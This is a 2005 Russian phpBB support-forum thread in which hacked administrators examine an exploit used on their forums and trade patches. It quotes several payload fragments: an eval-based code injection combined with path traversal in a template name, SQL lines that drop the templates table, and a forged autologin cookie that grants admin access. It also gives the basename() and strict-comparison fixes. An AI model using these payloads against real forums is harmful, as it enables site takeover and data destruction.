Защита в phpBB
Правила форума
Местная Конституция | Шаблон запроса | FAQ-2 (phpbb2) | FAQ-3 (phpbb3) | Как задавать вопросы | Как устанавливать моды
Местная Конституция | Шаблон запроса | FAQ-2 (phpbb2) | FAQ-3 (phpbb3) | Как задавать вопросы | Как устанавливать моды
Vladson 08.03.2005 18:58
Я брался за это недоброе дело (на версии 2.0.11) но потом понял что это фигня (нет уникальных модов, каждому нравится что-то своё)
Серый цвет светлый (светлее чёрного) и серый цвет тёмный (темнее белого) и серый цвет средний (между чёрным и белым).
Сколько бы мнений ни было все правда, а истины просто нет. Любой кто думает что докопался до истины всего лишь выдумал себе свою правду.
Хотя возможно просто поверил в чужую ложь...
Сколько бы мнений ни было все правда, а истины просто нет. Любой кто думает что докопался до истины всего лишь выдумал себе свою правду.
Хотя возможно просто поверил в чужую ложь...
-
Vladson - phpBB 2.0 RC-1 (pre)
- Сообщения: 949
- Зарегистрирован: 27.04.2004 5:07
- Откуда: Estonia, Tallinn
phpbb user 09.03.2005 11:10
День добрый!
Этот топик http://www.phpbbguru.net/community/viewtopic.php?t=2030
надо было начать в данном топике.
Итак вопрос - как защитить форум phpBB от интенсивных поисков типа * в троке запроса? Где можно найти моды защиты поиска?
Спасибо!
Этот топик http://www.phpbbguru.net/community/viewtopic.php?t=2030
надо было начать в данном топике.
Итак вопрос - как защитить форум phpBB от интенсивных поисков типа * в троке запроса? Где можно найти моды защиты поиска?
Спасибо!
- phpbb user
- phpBB 1.0.0
- Сообщения: 1
- Зарегистрирован: 09.03.2005 2:17
GGcube 06.04.2005 13:41
Вот значит у меня в phpbb известные дыры залотаны,окозалось что нет 
.Посторонний человек смог на моём форуме сменить шкуру в админке увидел вот такой код aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmpКак можно залотать дыру ?
.Посторонний человек смог на моём форуме сменить шкуру в админке увидел вот такой код aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmpКак можно залотать дыру ?-
GGcube - phpBB 1.0.0
- Сообщения: 6
- Зарегистрирован: 21.03.2005 14:59
Coagulant 06.04.2005 14:06
GGcube
У вас видимо не установлена последняя версия phpbb, либо установлена неправильно. Вам сюда: http://phpbbguru.net/community/viewtopi ... 7990#17990
У вас видимо не установлена последняя версия phpbb, либо установлена неправильно. Вам сюда: http://phpbbguru.net/community/viewtopi ... 7990#17990
-
Coagulant - phpBB 2.0.17
- Сообщения: 1011
- Зарегистрирован: 10.01.2005 19:43
- Откуда: Москва
Coagulant 06.04.2005 14:19
GGcube
В любом случае вас могли хакнуть каким-либо другим способом, а в логах просто остались следы попыток неудачного взлома.
Вообще для подобных вопросов тема уже поднималась:
http://phpbbguru.net/community/viewtopic.php?t=1905
В любом случае вас могли хакнуть каким-либо другим способом, а в логах просто остались следы попыток неудачного взлома.
Вообще для подобных вопросов тема уже поднималась:
http://phpbbguru.net/community/viewtopic.php?t=1905
-
Coagulant - phpBB 2.0.17
- Сообщения: 1011
- Зарегистрирован: 10.01.2005 19:43
- Откуда: Москва
PluSh_KiLLeR 11.04.2005 15:33
ну не знаю, меня ломали регулярно, пока мне это не надоело, и я стал отслеживать заплатки.
Пол года тишина
Пол года тишина
- PluSh_KiLLeR
- phpBB 1.2.1
- Сообщения: 20
- Зарегистрирован: 30.03.2005 12:57
- Откуда: Moscow
alexenin 05.06.2005 17:32
Вот и меня ломанули.
Только не понятно как размер поля смогли изненить в имени шаблона?
Да, еще вот нашлось чудо http://www.securitylab.ru/53295.html
- Код: Выделить всё
Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file
Только не понятно как размер поля смогли изненить в имени шаблона?
Да, еще вот нашлось чудо http://www.securitylab.ru/53295.html
Спасибо. Нет-нет, все равно спасибо.
-
alexenin - phpBB 1.2.1
- Сообщения: 29
- Зарегистрирован: 03.07.2004 14:16
VVVas 05.06.2005 17:38
alexenin
Цель эксплоита: phpBB версии до 2.0.13
вы нарушили правила конференции, объяснений не будет - сами читайте правила
я люблю daft punk | Активные темы
я люблю daft punk | Активные темы
-
VVVas - Люмпен Пролетариат
- Сообщения: 4556
- Зарегистрирован: 12.11.2004 0:20
- Откуда: RU-MSK
Siava 05.06.2005 18:02
alexenin
Очнулись, 2.0.15 ужеВидимо устарел (2.0.8 ).
Генератор db_update-файлов для phpBB 2.0
Еще одно нарушение правил и будете забанены.
© Mr. Anderson
Еще одно нарушение правил и будете забанены.
© Mr. Anderson
-
Siava - phpBB 3.0.2
- Сообщения: 2656
- Зарегистрирован: 11.01.2005 14:29
- Откуда: Питер
alexenin 05.06.2005 19:23
VVVas а исходник смотрел? Может на сегодняшний день он до 2.0.13, а завтра его спокойно можно использовать для другого немного изменив.
На первый взгляд баг заключался в отсутствии проверки местонахождения добавляемого стиля в файле admin_styles.php:
стало
Классно, да?
Мысль о том, что от эксплоида избавимся установив новую версию - это блеф. Форум был взломан через pagestart.php (допустил юзера) и admin_db_utilities.php (разрешил пользователю изменять базу), а в них изменений не произошло.
Пока пытался понять в чем дело, выяснилось, что эксплоид написан с изъяном. Стили исчезали из-за выполения
прописывался в config основным по умолчанию
Кто может подсказать, что в этой строке?
И самое интересное, что сначало возник вопрос, как смогли изменить размер поля template_name? А никак, просто таблица была удалена и создана заново.
На первый взгляд баг заключался в отсутствии проверки местонахождения добавляемого стиля в файле admin_styles.php:
- Код: Выделить всё
include($phpbb_root_path. "templates/" . $install_to . "/theme_info.cfg");
стало
- Код: Выделить всё
include($phpbb_root_path. "templates/" . basename($install_to) . "/theme_info.cfg");
Классно, да?
Мысль о том, что от эксплоида избавимся установив новую версию - это блеф. Форум был взломан через pagestart.php (допустил юзера) и admin_db_utilities.php (разрешил пользователю изменять базу), а в них изменений не произошло.
Пока пытался понять в чем дело, выяснилось, что эксплоид написан с изъяном. Стили исчезали из-за выполения
- Код: Выделить всё
#define SQL_TEMPLATES "DROP TABLE IF EXISTS "
прописывался в config основным по умолчанию
- Код: Выделить всё
#define SQL_FAKE_TEMPLATES_6 "_config set config_value=\"1\" where config_name=\"default_style\";"
- Код: Выделить всё
FAKE_TEMPLATES_NAMES "aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();
// /../../../../../../../../../../../../../../../../../../../tmp"
Кто может подсказать, что в этой строке?
- Код: Выделить всё
http << "_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D; expires=Fri, 24-Dec-2005 21:25:37 GMT; path=/; domain=";
И самое интересное, что сначало возник вопрос, как смогли изменить размер поля template_name? А никак, просто таблица была удалена и создана заново.
Спасибо. Нет-нет, все равно спасибо.
-
alexenin - phpBB 1.2.1
- Сообщения: 29
- Зарегистрирован: 03.07.2004 14:16
lEO-dead 06.06.2005 5:18
alexenin писал(а):Кто может подсказать, что в этой строке
типа вопорс на зачыпку?
формирует и отсылает кукис:
- Код: Выделить всё
phpbb2mysql_data=a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}
т.е. массифчик
Array (
[autologinid] => 1
[userid] => 2
)
- lEO-dead
- phpBB 1.2.0
- Сообщения: 12
- Зарегистрирован: 23.04.2005 6:16
alexenin 06.06.2005 5:35
lEO-dead писал(а):типа вопорс на зачыпку?
формирует и отсылает кукис:
хм.., почти. Выводит на ошибку, которая была в 2.0.14 исправлена.
- Код: Выделить всё
if( $sessiondata['autologinid'] === $auto_login_key )
Все плохо. Извините, просто разволновался.
Спасибо. Нет-нет, все равно спасибо.
-
alexenin - phpBB 1.2.1
- Сообщения: 29
- Зарегистрирован: 03.07.2004 14:16
Вернуться в phpBB-пространство
Кто сейчас на конференции
Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 0
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Time : 4.735s | 13 Queries | GZIP : On | Load : 0.36
Time : 4.735s | 13 Queries | GZIP : On | Load : 0.36
